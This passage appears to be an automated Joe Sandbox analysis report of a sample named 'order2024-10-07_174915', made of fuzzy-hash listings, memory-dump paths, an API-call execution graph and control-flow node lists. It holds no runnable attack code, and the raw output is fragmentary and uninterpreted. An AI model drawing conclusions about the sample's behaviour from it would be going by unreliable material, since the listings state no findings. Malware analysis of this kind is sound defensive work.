                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 873b6919c39e1b019a82c7dc977e0582da56de3efe2e569767876daad1f9546b
                                                  • Instruction ID: 873e057365c95aedd9d52afe944ecf58fef972a22d20d3c49a4de999e2e65c12
                                                  • Opcode Fuzzy Hash: 873b6919c39e1b019a82c7dc977e0582da56de3efe2e569767876daad1f9546b
                                                  • Instruction Fuzzy Hash: EAE01775A4020ACFC700CFA8D899AADBFB0EF0C314F20886AE402E73A0CB709844DF50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 148d093a33a7c6b51de5a035f304bed48bcd7dd5f07a29be0c1e9e1cbccd8859
                                                  • Instruction ID: 9c3a99f28b892448237cf252cda3068961dfd02609b420febe66704adbd8c4aa
                                                  • Opcode Fuzzy Hash: 148d093a33a7c6b51de5a035f304bed48bcd7dd5f07a29be0c1e9e1cbccd8859
                                                  • Instruction Fuzzy Hash: B5C08C3B1080415ECB02AB90C514F8A7FA1AFA9214F0C94A3D1C88A430CA229828DBA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f4638f90b9eef5e65589583fae68e246fe71bfcb4268c3b0108d06b3aa235b34
                                                  • Instruction ID: 0017c2bbf260cf69210efd185d994065a700255e59ce7dacd5b8335ce53e02ce
                                                  • Opcode Fuzzy Hash: f4638f90b9eef5e65589583fae68e246fe71bfcb4268c3b0108d06b3aa235b34
                                                  • Instruction Fuzzy Hash: 93C08C320043088FD3206BD9EA0DB387BACAB00206F041514D24E014528AA050E0CE62
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a359a1f35bfb61e62071586af6b8f4a01fdc6b0b096b9161bc4155860818282a
                                                  • Instruction ID: f0a59d191af91b6ac3fc0fd177564dd5e5f597b7719013f11a5ed291ad3dd60f
                                                  • Opcode Fuzzy Hash: a359a1f35bfb61e62071586af6b8f4a01fdc6b0b096b9161bc4155860818282a
                                                  • Instruction Fuzzy Hash: 46B092262082806AE20523F4C826B4EBB515FEA720F08A571E7C8461A1C82148A69227
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 966d629e7b21dbc54571e15d9b64184dbb033a5645ae2fc1181b0617dd893fa0
                                                  • Instruction ID: 3c54d0bc276894eb400896c91283b5e69a88832aeb8f295f0f5473d0f38bf787
                                                  • Opcode Fuzzy Hash: 966d629e7b21dbc54571e15d9b64184dbb033a5645ae2fc1181b0617dd893fa0
                                                  • Instruction Fuzzy Hash: AAB01279354310EF925066B44A8CE5AB153EFE1B00B00FE153205550D08564AC75D16F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 22cc597a1974728919e27bb9fe008b3fbb811136bd176edbbf36db72670480e1
                                                  • Instruction ID: 13bbbd0dccd14bbbb92c1b2c90f7ee9fcc1f77b635e714b32d349ea14e349403
                                                  • Opcode Fuzzy Hash: 22cc597a1974728919e27bb9fe008b3fbb811136bd176edbbf36db72670480e1
                                                  • Instruction Fuzzy Hash: 71E10AB4E002199FDB14DF99C584AAEFBB2FF89305F248169D414AB315D730AD42CFA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 206b2e01963ce187ec8649d03a006563908578ac96426bc3aacd4aaf2269eb61
                                                  • Instruction ID: ad17702b15906458bed264b00eaff8c22ea2e6a68aa50db76861b0e51304c183
                                                  • Opcode Fuzzy Hash: 206b2e01963ce187ec8649d03a006563908578ac96426bc3aacd4aaf2269eb61
                                                  • Instruction Fuzzy Hash: E7E10AB4E002199FDB14DF99C584AAEFBB2FF89305F248169D414AB355D730AD42CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52f6bd2b7b5ee2bf0e8184e56bb179cf581ddf34a0ff3df7e9a4c70ff1095e0c
                                                  • Instruction ID: 0e45071775eaa96248c1e84a8a6eca389cd1a40e5e364a6aba414fe3e48c437a
                                                  • Opcode Fuzzy Hash: 52f6bd2b7b5ee2bf0e8184e56bb179cf581ddf34a0ff3df7e9a4c70ff1095e0c
                                                  • Instruction Fuzzy Hash: 26E10AB4E002199FDB14DF99C584AAEFBB2FF89305F248169D814AB355D731AD42CFA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a8d59ad0d5691492adebfb78ed40e5b0b721b9134b410bf03e521d2cf11d0a11
                                                  • Instruction ID: a5122f1a3c6852de60a9186e8726df71ee7a72fa2109f12d7695364480b01ac7
                                                  • Opcode Fuzzy Hash: a8d59ad0d5691492adebfb78ed40e5b0b721b9134b410bf03e521d2cf11d0a11
                                                  • Instruction Fuzzy Hash: 1BE11BB4E002599FDB14DFA9C584AAEFBB2FF89305F248169E414AB355C7709D41CFA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d660b98017f45abdfa9885238fb180db07e7e86610a8a85aee75046d17b9e4b
                                                  • Instruction ID: 1ec39f458d045275a230729ad8f3c44e4b4029ddb55b31e01f7417282e3e8b37
                                                  • Opcode Fuzzy Hash: 7d660b98017f45abdfa9885238fb180db07e7e86610a8a85aee75046d17b9e4b
                                                  • Instruction Fuzzy Hash: A8E1FAB4E002199FDB14DFA9C584AAEFBB2FF89305F248169D814AB355D7319D42CFA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1f4afc02065f2a069a2d53a9343689bd7eb8594ca9e65993a56c5d8d110ec78
                                                  • Instruction ID: a93ff91090e009e3c596418166177a8b8a114be4e78cb5e735bb0f3f3b7c8805
                                                  • Opcode Fuzzy Hash: c1f4afc02065f2a069a2d53a9343689bd7eb8594ca9e65993a56c5d8d110ec78
                                                  • Instruction Fuzzy Hash: 2AD1F435D1075A8ACB11EF68D994AD9F7B1FFA5300F10C7AAE1093B210EB706AD5CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b86e2aec983ab7371a4a9d8b3452f3d79addf1e32abe49282632b91718ab302
                                                  • Instruction ID: 7b8e5f260d5a6fe94c5297d57ab7b33620e767a739640ee88e3922099f8b1b6f
                                                  • Opcode Fuzzy Hash: 6b86e2aec983ab7371a4a9d8b3452f3d79addf1e32abe49282632b91718ab302
                                                  • Instruction Fuzzy Hash: 86A17D32E002168FCF55DFB4CC445AEBBB2FF85301B1585AAED06AB265DB31E916CB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 44c818a75cf76f3ee0ef1f749685fdce9be60085ff0b6e2ffbe37750761e0321
                                                  • Instruction ID: d19067d4775faa1407dd755b45f6932ec92f13bbaa3e8a40129a275dfc58f0ca
                                                  • Opcode Fuzzy Hash: 44c818a75cf76f3ee0ef1f749685fdce9be60085ff0b6e2ffbe37750761e0321
                                                  • Instruction Fuzzy Hash: FDD1F435D1075A8ACB11EF68D994AD9F7B1FFA5300F10C7AAE1093B210EB706AD5CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de6f6cb90ded0e6e33f6e89c53601450c37887f86cbd3513ec668124b8924bae
                                                  • Instruction ID: 8ae658cd9ffcaf6983cc8479b89a3c85c6cc9f1cc3488296241931d8b406b441
                                                  • Opcode Fuzzy Hash: de6f6cb90ded0e6e33f6e89c53601450c37887f86cbd3513ec668124b8924bae
                                                  • Instruction Fuzzy Hash: 62512EB0E042199FDB14DFA9C5445AEFBF2FF89304F248169D418AB315D7319A42CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6a208b09678065c747fe486885eccbf87badb38f338b16cd5b1e3da791657438
                                                  • Instruction ID: 9c3170d7d2944433794f3674e30285c85e0c67c11bd6358876ce5d4d5adce871
                                                  • Opcode Fuzzy Hash: 6a208b09678065c747fe486885eccbf87badb38f338b16cd5b1e3da791657438
                                                  • Instruction Fuzzy Hash: AF5131B5E042199FDB14CFA9C5846AEFBF2FF89304F248169C418AB356D7359941CF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c0b968f5b67f08b8c0114f475aa0ee78759151ae659dd028cbc807dc2e9848ee
                                                  • Instruction ID: bb113467eee56a1f7304da1f57b768294e729f631c76d95f1fd18d905bba914e
                                                  • Opcode Fuzzy Hash: c0b968f5b67f08b8c0114f475aa0ee78759151ae659dd028cbc807dc2e9848ee
                                                  • Instruction Fuzzy Hash: 9B512CB4E002199FDB14DFA9C5845AEFBF2FF89304F24816AD418AB315D7349942CFA1

                                                  Execution Graph

                                                  Execution Coverage:9.2%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:52
                                                  Total number of Limit Nodes:7
                                                  execution_graph 35036 65c3dd8 35037 65c3e00 35036->35037 35040 65c3e2c 35036->35040 35038 65c3e09 35037->35038 35041 65c325c 35037->35041 35042 65c3267 35041->35042 35044 65c4123 35042->35044 35045 65c3278 35042->35045 35044->35040 35046 65c4158 OleInitialize 35045->35046 35047 65c41bc 35046->35047 35047->35044 35048 2c6c120 DuplicateHandle 35049 2c6c1b6 35048->35049 35069 65c1ac0 35073 65c1ae0 35069->35073 35077 65c1ada 35069->35077 35070 65c1aca 35074 65c1b22 35073->35074 35076 65c1b29 35073->35076 35075 65c1b7a CallWindowProcW 35074->35075 35074->35076 35075->35076 35076->35070 35078 65c1ae0 35077->35078 35079 65c1b7a CallWindowProcW 35078->35079 35080 65c1b29 35078->35080 35079->35080 35080->35070 35050 2c67e88 35051 2c67e8d 35050->35051 35052 2c67eab 35051->35052 35054 2c690f8 35051->35054 35055 2c69102 35054->35055 35056 2c69122 35055->35056 35059 65a2f48 35055->35059 35064 65a2f38 35055->35064 35056->35051 35061 65a2f5d 35059->35061 35060 65a31a8 35060->35056 35061->35060 35062 65a35c8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 35061->35062 35063 65a35d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 35061->35063 35062->35061 35063->35061 35065 65a2f5d 35064->35065 35066 65a31a8 35065->35066 35067 65a35d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 35065->35067 35068 65a35c8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 35065->35068 35066->35056 35067->35065 35068->35065 35081 2c6c738 35083 2c6c766 35081->35083 35085 2c6bca4 35083->35085 35084 2c6c786 35084->35084 35086 2c6bcaf 35085->35086 35087 2c6ee4f 35086->35087 35090 65c4370 35086->35090 35094 65c4360 35086->35094 35087->35084 35092 65c43d5 35090->35092 35091 65c4838 WaitMessage 35091->35092 35092->35091 35093 65c4422 35092->35093 35093->35087 35097 65c4370 35094->35097 35095 65c4838 WaitMessage 35095->35097 35096 65c4422 35096->35087 35097->35095 35097->35096

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1899 65c4370-65c43d3 1900 65c43d5-65c43ff 1899->1900 1901 65c4402-65c4420 1899->1901 1900->1901 1906 65c4429-65c4460 1901->1906 1907 65c4422-65c4424 1901->1907 1911 65c4466-65c447a 1906->1911 1912 65c4891 1906->1912 1909 65c48e2-65c48f7 1907->1909 1913 65c447c-65c44a6 1911->1913 1914 65c44a9-65c44c8 1911->1914 1915 65c4896-65c48ac 1912->1915 1913->1914 1921 65c44ca-65c44d0 1914->1921 1922 65c44e0-65c44e2 1914->1922 1915->1909 1924 65c44d4-65c44d6 1921->1924 1925 65c44d2 1921->1925 1926 65c44e4-65c44fc 1922->1926 1927 65c4501-65c450a 1922->1927 1924->1922 1925->1922 1926->1915 1928 65c4512-65c4519 1927->1928 1929 65c451b-65c4521 1928->1929 1930 65c4523-65c452a 1928->1930 1931 65c4537-65c454d call 65c32d8 1929->1931 1932 65c452c-65c4532 1930->1932 1933 65c4534 1930->1933 1935 65c4552-65c4554 1931->1935 1932->1931 1933->1931 1936 65c46a9-65c46ad 1935->1936 1937 65c455a-65c4561 1935->1937 1938 65c487c-65c488f 1936->1938 1939 65c46b3-65c46b7 1936->1939 1937->1912 1940 65c4567-65c45a4 1937->1940 1938->1915 1941 65c46b9-65c46cc 1939->1941 1942 65c46d1-65c46da 1939->1942 1948 65c45aa-65c45af 1940->1948 1949 65c4872-65c4876 1940->1949 1941->1915 1943 65c46dc-65c4706 1942->1943 1944 65c4709-65c4710 1942->1944 1943->1944 1946 65c47af-65c47c4 1944->1946 1947 65c4716-65c471d 1944->1947 1946->1949 1962 65c47ca-65c47cc 1946->1962 1951 65c474c-65c476e 1947->1951 1952 65c471f-65c4749 1947->1952 1953 65c45e1-65c45f6 call 65c32fc 1948->1953 1954 65c45b1-65c45bf call 65c32e4 1948->1954 1949->1928 1949->1938 1951->1946 1989 65c4770-65c477a 1951->1989 1952->1951 1960 65c45fb-65c45ff 1953->1960 1954->1953 1964 65c45c1-65c45df call 65c32f0 1954->1964 1965 65c4670-65c467d 1960->1965 1966 65c4601-65c4613 call 65c3308 1960->1966 1967 65c47ce-65c4807 1962->1967 1968 65c4819-65c4836 call 65c32d8 1962->1968 1964->1960 1965->1949 1981 65c4683-65c468d call 65c3318 1965->1981 1993 65c4615-65c4645 1966->1993 1994 65c4653-65c466b 1966->1994 1984 65c4809-65c480f 1967->1984 1985 65c4810-65c4817 1967->1985 1968->1949 1980 65c4838-65c4864 WaitMessage 1968->1980 1986 65c486b 1980->1986 1987 65c4866 1980->1987 1995 65c469c-65c46a4 call 65c3330 1981->1995 1996 65c468f-65c4697 call 65c3324 1981->1996 1984->1985 1985->1949 1986->1949 1987->1986 2000 65c477c-65c4782 1989->2000 2001 65c4792-65c47ad 1989->2001 2003 65c464c 1993->2003 2004 65c4647 1993->2004 1994->1915 1995->1949 1996->1949 2007 65c4784 2000->2007 2008 65c4786-65c4788 2000->2008 2001->1946 2001->1989 2003->1994 2004->2003 2007->2001 2008->2001
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2507920215.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_65c0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 06c31f1ac11e63b899149efba2f65817b79504be21b4993cbb60c88f58302948
                                                  • Instruction ID: 591b57beab3245caf4a5782cba84d05465c22b1e102eed5a17d593c01d01740b
                                                  • Opcode Fuzzy Hash: 06c31f1ac11e63b899149efba2f65817b79504be21b4993cbb60c88f58302948
                                                  • Instruction Fuzzy Hash: 50F11734E00209CFEB64DFA9C954FADBBF1BF88324F158569E405AB265DB70A945CF80

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2011 65a3db0-65a3dbb 2012 65a3dbd-65a3ddc call 65a34e0 2011->2012 2013 65a3de5-65a3e04 call 65a34ec 2011->2013 2016 65a3de0-65a3de4 2012->2016 2020 65a3e0a-65a3e4c 2013->2020 2021 65a3e06-65a3e09 2013->2021 2020->2016 2026 65a3e4e-65a3e69 2020->2026 2029 65a3e6b-65a3e6e 2026->2029 2030 65a3e6f-65a3efc GlobalMemoryStatusEx 2026->2030 2034 65a3efe-65a3f04 2030->2034 2035 65a3f05-65a3f2d 2030->2035 2034->2035
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2507894347.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_65a0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6429223aca0b763b4637e0396c84cc1f5f1979c7dd55af959d7319dfb2654ee3
                                                  • Instruction ID: 067425b18a13bb27b3c59189729c5690aa213d0fdc5c01bd8f3a2d7417b92f76
                                                  • Opcode Fuzzy Hash: 6429223aca0b763b4637e0396c84cc1f5f1979c7dd55af959d7319dfb2654ee3
                                                  • Instruction Fuzzy Hash: 75410232E043569FCB14DFAAD8046DEBBF5EF89220F14856AE404E7241DB789845CBE1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2038 65c1ae0-65c1b1c 2039 65c1bcc-65c1bec 2038->2039 2040 65c1b22-65c1b27 2038->2040 2046 65c1bef-65c1bfc 2039->2046 2041 65c1b29-65c1b60 2040->2041 2042 65c1b7a-65c1bb2 CallWindowProcW 2040->2042 2048 65c1b69-65c1b78 2041->2048 2049 65c1b62-65c1b68 2041->2049 2044 65c1bbb-65c1bca 2042->2044 2045 65c1bb4-65c1bba 2042->2045 2044->2046 2045->2044 2048->2046 2049->2048
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 065C1BA1
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2507920215.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_65c0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 1958dec6ffaecfda5c91385aa016ebbda1642ac9092e6d630d36907c5a9afc72
                                                  • Instruction ID: 9040bc443779813960e5f86129759ac9fcae7fdd45a9fd912457772c8f66b370
                                                  • Opcode Fuzzy Hash: 1958dec6ffaecfda5c91385aa016ebbda1642ac9092e6d630d36907c5a9afc72
                                                  • Instruction Fuzzy Hash: 3C4138B9900705CFDB54CF99C448A9ABBF5FF88324F24845DE419AB321D375A841CFA0
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C6C1A7
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2504098433.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c60000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 55ee38b4092a8f96a06ab80bfcc93be3a2bb36a8f6c28e0a65abaa35924008f2
                                                  • Instruction ID: fe7386c46acb97f717e8e4b0871d0a0adda0674b4a28a53d6ecd0650dc67b8ee
                                                  • Opcode Fuzzy Hash: 55ee38b4092a8f96a06ab80bfcc93be3a2bb36a8f6c28e0a65abaa35924008f2
                                                  • Instruction Fuzzy Hash: 452105B6D00209EFDB10CF99D984ADEBBF4EB48310F14801AE954A7350C335A940CFA1
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C6C1A7
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2504098433.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c60000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 62f71c9a007d3df4f21aeaf42129f0caf4b52979ce4c00f468b2566ddc25944e
                                                  • Instruction ID: c55ed1b15d3a4fb372ae3f472bdb18989df29e83ac891dc8eb98de87d1943611
                                                  • Opcode Fuzzy Hash: 62f71c9a007d3df4f21aeaf42129f0caf4b52979ce4c00f468b2566ddc25944e
                                                  • Instruction Fuzzy Hash: 9221C4B6D00249EFDB10CF9AD984ADEBBF4EB48310F14841AE954A7350D379AA44CF65
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,065A3E02), ref: 065A3EEF
                                                  Memory Dump Source